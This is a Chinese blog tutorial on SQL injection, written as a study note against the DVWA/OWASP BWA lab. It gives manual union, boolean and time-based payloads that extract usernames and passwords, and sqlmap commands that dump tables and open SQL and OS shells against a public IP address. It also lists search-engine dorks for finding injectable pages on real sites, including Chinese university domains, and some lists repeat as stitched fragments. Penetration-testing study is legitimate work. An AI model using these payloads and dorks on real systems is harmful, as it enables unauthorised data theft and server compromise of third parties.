渗透学习-sql注入

最新推荐文章于 2024-06-25 17:25:15 发布
最新推荐文章于 2024-06-25 17:25:15 发布
阅读量351 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/memery_key/article/details/105853954
版权

渗透学习-sql注入

1、项目环境

目标靶机:OWASP_BWA

测试渗透机:kali2020

2、SQL注入危害

1.数据库信息泄露

2.网页篡改:登陆后台后发布恶意内容

3.网站挂马 : 当拿到webshell时或者获取到服务器的权限以后,可将一些网页木马挂在服务器上,去攻击别人

4.私自添加系统账号

5.读写文件获取webshell

3、注入流程

1、判断是否有sql注入点

2、判断操作系统,数据库,和web应用的类型

3、获取数据库信息,包括管理员信息和拖库

4、加密信息破解,sqlmap可以自动破解

5、提升权限,获得sql-shell、os-shell、登陆应用后台

4、手动注入实战

4.1基于错误的注入

原语句

select first_name,last_name from dvwa.users where user_id=''

输入一个单引号,如果报语法错误说明输入了,有注入点

select first_name,last_name from dvwa.users where user_id='''

4.2基于布尔的注入

思路是闭合sql语句、构造or和and语句、注释多余代码

原语句

select first_name,last_name from dvwa.users where user_id=''

select first_name,last_name from dvwa.users where user_id='  ' or 1=1 -- '     '

用’闭合之前语句,or1=1是布尔为真的条件,–注释掉后面语句

注:只能查到当前表和字段

4.3基于Union的注入

原始语句

select first_name,last_name from dvwa.users where user_id=''

先猜字段

'union select 1 -- '
'union select 1,2 -- '
'union select 1,2,3 -- '
'union select 1,2,3,4 -- '

select first_name,last_name from dvwa.users where user_id=''union select 1 -- ''
select first_name,last_name from dvwa.users where user_id=''union select 1,2 -- ''

获得当前数据库和用户信息

'union select version(),database() -- '

'union select user(),database() -- '

select first_name,last_name from dvwa.users where user_id=''union select version(),database() -- ''
select first_name,last_name from dvwa.users where user_id=''union select user(),database() -- ''

说明:

version() 获得数据库版本信息

database() 获得当前数据库名

user() 获得当前用户名

查询数据库中所有表

information_schema数据库是MYSQL自带的,他提供了访问数据库元数据的方式

元数据包括数据库名、表名、列数据类型、访问权限、字符集等基础信息

注入语句

select * from information_schema.TABLES\G

查询所有库名

'union select TABLE_SCHEMA,1 from INFORMATION_SCHEMA.tables -- '
select first_name,last_name from dvwa.users where user_id=''union select TABLE_SCHEMA,1 from INFORMATION_SCHEMA.tables -- ''

查询所有库中所有表名

'union select table_name,1 from INFORMATION_SCHEMA.tables -- '
select first_name,last_name from dvwa.users where user_id=''union select table_name,1 from INFORMATION_SCHEMA.tables -- ''

同时查询表名及对应库名

'union select table_name,TABLE_SCHEMA from INFORMATION_SCHEMA.tables -- '
select first_name,last_name from dvwa.users where user_id=''union select table_name,TABLE_SCHEMA from INFORMATION_SCHEMA.tables -- ''

原始语句

select first_name,last_name from dvwa.users where user_id=''

查询数据表

'union select 1,column_name from INFORMATION_SCHEMA.column where table_name='users' -- '

'union select 1,column_name from INFORMATION_SCHEMA.column where table_name='USER_PRIVILEGES' -- '

'union select 1,column_name from INFORMATION_SCHEMA.column where table_name='SCHEMA_PRIVILEGES' -- '

注入语句

select first_name,last_name from dvwa.users where user_id=''union select 1,column_name from INFORMATION_SCHEMA.column where table_name='users' -- '


select first_name,last_name from dvwa.users where user_id=''union select 1,column_name from INFORMATION_SCHEMA.column where table_name='USER_PRIVILEGES' -- '

select first_name,last_name from dvwa.users where user_id=''union select 1,column_name from INFORMATION_SCHEMA.column where table_name='SCHEMA_PRIVILEGES' -- '

查询数据列

'union select NULL,user from users --'
'union select NULL,password from users --'
'union select user,password from users --'
'union select NULL,GRANTEE from users --'
'union select password,concat(first_name,'',last_name,'',user) from users --'

sql注入语句解析

use dvwa;
select first_name,last_name from dvwa.users where user_id=''union select password,concat(first_name,'',last_name,'',user) from users --''

4.4基于时间的盲注

有些数据库对错误信息做了安全配置,使得无法通过上述方式探测注入点

此时,通过设置sleep语句来探测注入点

select first_name,last_name from dvwa.users where user_id='1' and sleep(5) -- '

5、sqlmap自动化注入

kali自带

windows要安装

操作

img

拿到url以后,就可以使用这个url来注入了

Windows

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#"

kali

sqlmap -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#"

出现如下结果,则表示sqlmap检测到有可以注入的地方,

img

如果没有检测到可以注入的地方,会显示如下

img

检测到有可以注入的地方,现在我们就来通过这个注入来获取一些数据库的信息

windows

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs

kali
sqlmap -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" --dbs

img

再进一步,获取某个数据库中表的信息

windows

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa --tables

kali
sqlmap -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa --tables

拿到了dvwa这个库中的所有表的名字

img

再进一步,获取表中的字段信息

windows

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users --columns

kali

sqlmap -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users --columns

拿到了表中的所有字段

img

拿表中数据

windows

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users --dump

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users -C “user,password” --dump

kali
sqlmap -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users --dump

sqlmap -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users -C “user,password” --dump

加cookie

windows

python2 sqlmap.py -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="Hm_lvt_8d8d2f308d6e6dffaf586bd024670861=1587903375"

kali

sqlmap -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="Hm_lvt_8d8d2f308d6e6dffaf586bd024670861=1587903375"

goole搜索可能有注入的页面

inurl:.php?id=

inurl:.jsp?id=

inurl:.asp?id=

inurl:/admin/login.php

inurl:.php?id=  intitle:美女

百度搜索

inurl:news.php?id=  site:edu.cn

inurl:news.jsp?id=  site:edu.cn

inurl:news.asp?id=  site:edu.cn

参数列表

-u 加链接

-p 指定参数

–batch 自动确定信息

–cookie 加cookie

–users

–current-user

–dbs

–current-db

-D “database_name” -T “table_name” --columns

-D “database_name” -T “table_name” --C “username,password” --dump

–sql-shell 与数据库交互

–os-shell 获得系统shell

–os-cmd=ls /

.jsp?id= site:edu.cn

inurl:news.asp?id= site:edu.cn




### 参数列表

-u 加链接

-p 指定参数

--batch 自动确定信息

--cookie 加cookie

--users

--current-user

--dbs

--current-db

-D "database_name" -T "table_name" --columns

-D "database_name" -T "table_name" --C "username,password" --dump

--sql-shell 与数据库交互

--os-shell 获得系统shell

--os-cmd=ls /
memery_key
关注
web渗透--22--SQL注入(上)
武天旭的博客
09-15 9554
1、漏洞描述 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。造成SQL注入漏洞原因有两个:一个是没有对输入...
渗透测试——sql注入
yukinorong的博客
07-23 594
判断注入点 单引号判断 http://xxx/abc.php?id=1' 如果页面返回错误,则存在 Sql 注入。 原因是无论字符型还是整型都会因为单引号个数不匹配而报错。 (如果未报错,不代表不存在 Sql 注入,因为有可能页面对单引号了过滤,这时可以使用判断语句进行注入) 判断sql注入类型 数字型 ?id= x and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。 字符型 ?id= x' and '1'='2 页面运行错误,则说明此 Sql 注入为字符型注入。 sq
简单的SQL渗透
shupianbenben的博客
09-13 432
SQL注入靶场
渗透测试之SQL注入
最新发布
CheatMyself的博客
06-25 2002
按照攻击类型分为:联合查询注入、布尔注入、时间延迟注入、报错型注入、堆叠型注入等按照注入位置分为:HTTP头注入、请求参数注入等按照数据库场景分为:MySQL注入、MSSQL注入、Oracle场景注入。
渗透SQL注入
Jian Sun_的博客
05-17 828
SQL注入攻击 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击. 注:来源于百度百科 SQL的危害及
【安全渗透sql注入
wy233333的博客
04-09 774
目录1. sql 注入1.1 sql 注入 介绍1.2 sql 注入 原理1.3 sql 注入 危害1.4 sql 注入 实现方式2. 环境搭建2.1 vmware虚拟机软件2.2 靶机(学习使用项目环境)2.3 渗透机(学习攻击 sql 注入环境)3. sql语句基本操作(mysql为例)3.1 基本 sql 库操作语句3.2 查询语句3.3 联合查询 union3.4 特殊数据库 1. sql...
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3103
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
渗透测试-sql注入漏洞
课嗨教育的专栏
09-06 416
在应用中,通常为了安全,开发者会开启PHP的magic_quotes_gpc,或者是addslashes、mysql_real_escape_string等函数对客户端传染到的参数没有进行过滤,则注入的单引号或双引号就会被“\”转义,但是,如果服务器端的数据库使用的是GB2312、GBK、GB18030等宽字节的编码是,则依然会造成注入。id=1%df%5c%27,这个%27则是单引号的编码,在这种情况下%df%5c在GBK编码中是繁体字運,这样就成功闭合掉了转义后的\,这样就可以成功使’闭合。
渗透入侵\超级SQL注入工具 SSQLInjection V1.0.zip
07-15
超级SQL注入工具 SSQLInjection V1.0
渗透入侵\jsql.zip
07-15
渗透入侵\jsql
SQL渗透与防御——(二)SQL注入
FisrtBqy的博客
02-27 4038
SQL注入
SQL注入——渗透day06
qq_62716256的博客
08-12 1007
SQL注入——渗透day06
SQL注入渗透与防御
yk2909438315的博客
07-10 2321
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。web应用程序:移动端的app或PC端的网站网页。
搞懂安全渗透之 SQL 注入(入门篇)
不想打代码
07-21 4357
安全渗透的分类 web 数据库安全 (SQL注入漏洞) web 应用服务器安全 (文件上传漏洞,文件包含漏洞) web 客户端安全 (XSS跨站攻击) SQL注入介绍 SQL注入在安全问题种排行榜首 SQL注入攻击指的是 输入参数未经过滤,然后直接拼到SQL语句当中解析 SQL注入是一种将 SQL 代码添加到输入参数中,传递到服务器解析并执行的一种攻击手法 SQL注入原理 攻击者在页面提交恶意字符 服务器未对提交参数进行过滤或过滤不足 攻击者利用拼接SQL语句方式获取数据库敏感信息 举个最简单
渗透测试---手把手教你SQL注入(5)---Cookie注入,宽字节注入与堆叠注入
weixin_52796034的博客
10-13 551
SQL注入中,尤其是使用ASP的网站中,Cookie注入是一种常见的攻击方式。Cookie是Web应用程序在客户端计算机上存储的小型数据片段,用于跟踪用户会话状态和存储其他个性化信息。有时我们可以通过在Cookie中注入恶意代码来绕过一些安全措施,并执行恶意的SQL查询。
渗透测试----手把手教你SQL手工注入--(联合查询,报错注入)
weixin_52796034的博客
10-09 1686
报错注入是一种特殊的SQL注入攻击方式,它利用了应用程序对异常处理的不完善,通过在输入的SQL语句中插入恶意的SQL语句,达到获取未授权数据的目的。 在报错注入中,我们可以通过在输入的数据中插入SQL语句的异常字符,使得应用程序抛出异常,从而获取应用程序的错误信息。这些错误信息可能包含了应用程序的敏感数据,如数据库表结构、列名、存储过程等。
SQL注入学习指南:Sqli-labs实战教程
SQL注入天书》不仅适合渗透测试人员学习,也对web开发者和安全研究人员具有很的参考价值,因为它强调了预防措施和漏洞修复的重要性。通过阅读和实践书中的挑战和实验,读者可以提升在实际环境中发现和抵御SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值